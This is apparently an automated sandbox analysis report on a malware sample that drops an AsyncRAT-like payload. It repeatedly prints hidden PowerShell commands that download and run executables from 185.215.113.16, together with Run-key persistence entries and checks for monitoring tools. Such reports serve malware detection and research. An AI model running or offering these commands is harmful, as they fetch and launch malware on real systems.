Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

Yara detected Costura Assembly Loader

Source: Yara match	File source: 7.2.k6Sly2p.exe.56e0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.k6Sly2p.exe.56e0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2828666224.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000042.00000002.2801612037.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: k6Sly2p.exe PID: 5796, type: MEMORYSTR

Binary contains a suspicious time stamp

Source: random[2].exe.6.dr

Static PE information: 0xDA43F2C8 [Mon Jan 14 22:35:52 2086 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_00F142DE

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: 9228e21255.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x557df
Source: k6Sly2p.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x2511a4
Source: random[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xbb8c2
Source: random[2].exe0.6.dr	Static PE information: real checksum: 0x0 should be: 0x557df
Source: 5d2afc26b8.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xbb8c2
Source: random[1].exe1.6.dr	Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: k6Sly2p[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x2511a4
Source: random[2].exe1.6.dr	Static PE information: real checksum: 0x21288c should be: 0x210b0e
Source: dc785309cb.exe.6.dr	Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x20fa2e should be: 0x219cd6
Source: DhqvS8pXj8.exe	Static PE information: real checksum: 0x20fa2e should be: 0x219cd6
Source: d895046020.exe.6.dr	Static PE information: real checksum: 0x21288c should be: 0x210b0e
Source: k6Sly2p.exe0.6.dr	Static PE information: real checksum: 0x0 should be: 0x2511a4
Source: random[2].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x74670
Source: 1e8dfbd5c2.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x74670

PE file contains sections with non-standard names

Source: DhqvS8pXj8.exe	Static PE information: section name:
Source: DhqvS8pXj8.exe	Static PE information: section name: .idata
Source: DhqvS8pXj8.exe	Static PE information: section name:
Source: DhqvS8pXj8.exe	Static PE information: section name: fsnlaalu
Source: DhqvS8pXj8.exe	Static PE information: section name: pycumdux
Source: DhqvS8pXj8.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: fsnlaalu
Source: skotes.exe.0.dr	Static PE information: section name: pycumdux
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name: .idata
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name: voasjcay
Source: random[2].exe1.6.dr	Static PE information: section name: mgtkptwk
Source: random[2].exe1.6.dr	Static PE information: section name: .taggant
Source: d895046020.exe.6.dr	Static PE information: section name:
Source: d895046020.exe.6.dr	Static PE information: section name: .idata
Source: d895046020.exe.6.dr	Static PE information: section name:
Source: d895046020.exe.6.dr	Static PE information: section name: voasjcay
Source: d895046020.exe.6.dr	Static PE information: section name: mgtkptwk
Source: d895046020.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe2.6.dr	Static PE information: section name: .symtab

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_008FD91C push ecx; ret	6_2_008FD92F
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B2272 push esi; ret	7_2_027B227C
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B2256 push ebp; ret	7_2_027B2257
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B23EC push eax; ret	7_2_027B23ED
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B2450 push ebp; ret	7_2_027B255E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B2550 push ebp; ret	7_2_027B255E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B4545 push ebp; ret	7_2_027B46AE
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B45D0 push ebp; ret	7_2_027B46AE
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B08F8 push esp; ret	7_2_027B0906
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B098F push ebx; ret	7_2_027B099E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B3740 push ebx; ret	7_2_027B374E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B3543 push esi; ret	7_2_027B3546
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B1A78 push ebp; ret	7_2_027B1A82
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B3AFF push eax; ret	7_2_027B3B01
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B3B78 push eax; ret	7_2_027B3B86
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B3B4B push ecx; ret	7_2_027B3B4C
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B3B88 push eax; ret	7_2_027B3C16
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B397B push ebx; ret	7_2_027B397E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B3D79 push esp; ret	7_2_027B3D86
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0493754F push ss; iretd	7_2_04937557
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049330F4 push ds; iretd	7_2_049330FD
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049349E6 pushad ; ret	7_2_049349E7
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_060831B0 push ebp; iretd	7_2_060831B5
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_06083DB7 push edx; ret	7_2_06083DB8
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F30A76 push ecx; ret	8_2_00F30A89
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04D03435 pushad ; iretd	13_2_04D03439
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04D031AA pushfd ; ret	13_2_04D031B9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04D033AB pushad ; iretd	13_2_04D03439

Source: DhqvS8pXj8.exe	Static PE information: section name: entropy: 7.084846373081339
Source: DhqvS8pXj8.exe	Static PE information: section name: fsnlaalu entropy: 7.953941964036779
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.084846373081339
Source: skotes.exe.0.dr	Static PE information: section name: fsnlaalu entropy: 7.953941964036779
Source: random[2].exe1.6.dr	Static PE information: section name: entropy: 7.940912998585798
Source: random[2].exe1.6.dr	Static PE information: section name: voasjcay entropy: 7.952788344032962
Source: d895046020.exe.6.dr	Static PE information: section name: entropy: 7.940912998585798
Source: d895046020.exe.6.dr	Static PE information: section name: voasjcay entropy: 7.952788344032962

Source: random[2].exe.6.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'iJ7hGcJiZtrY1vmTXS1', 'l3eRiSJQRS1T675dhDw', 'reTlcDMFua', 'BxhRGVJ7kheGMf3Py2t', 'gg3ZFVJakBdVFuZCIgG', 'G5c3kgJhorWWcabQiWI', 'Gim47mJIx9UyjsEXoD7', 'ItKq8kJ0OyIS0T9lLUQ', 'N6HgC6J6Gp0JEvuuieG', 'g4UifPJHxIeKxNQ4Axj'
Source: 1e8dfbd5c2.exe.6.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'iJ7hGcJiZtrY1vmTXS1', 'l3eRiSJQRS1T675dhDw', 'reTlcDMFua', 'BxhRGVJ7kheGMf3Py2t', 'gg3ZFVJakBdVFuZCIgG', 'G5c3kgJhorWWcabQiWI', 'Gim47mJIx9UyjsEXoD7', 'ItKq8kJ0OyIS0T9lLUQ', 'N6HgC6J6Gp0JEvuuieG', 'g4UifPJHxIeKxNQ4Axj'
Source: random[1].exe.6.dr, PjMboxrZKVMRiayL4T.cs	High entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'
Source: random[1].exe.6.dr, IAYNcYxlTFn1TcgV7Nc.cs	High entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'
Source: 5d2afc26b8.exe.6.dr, PjMboxrZKVMRiayL4T.cs	High entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'
Source: 5d2afc26b8.exe.6.dr, IAYNcYxlTFn1TcgV7Nc.cs	High entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	File created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com			Jump to dropped file

Tries to download and execute files (via powershell)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075515001\k6Sly2p.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	File created: C:\ProgramData\jhbbvnx\fbpbh.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075519001\Fe36XBk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\7fOMOTQ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	File created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k6Sly2p[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075517001\7fOMOTQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe

File created: C:\ProgramData\jhbbvnx\fbpbh.exe

Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run afccf6841f.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd			Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
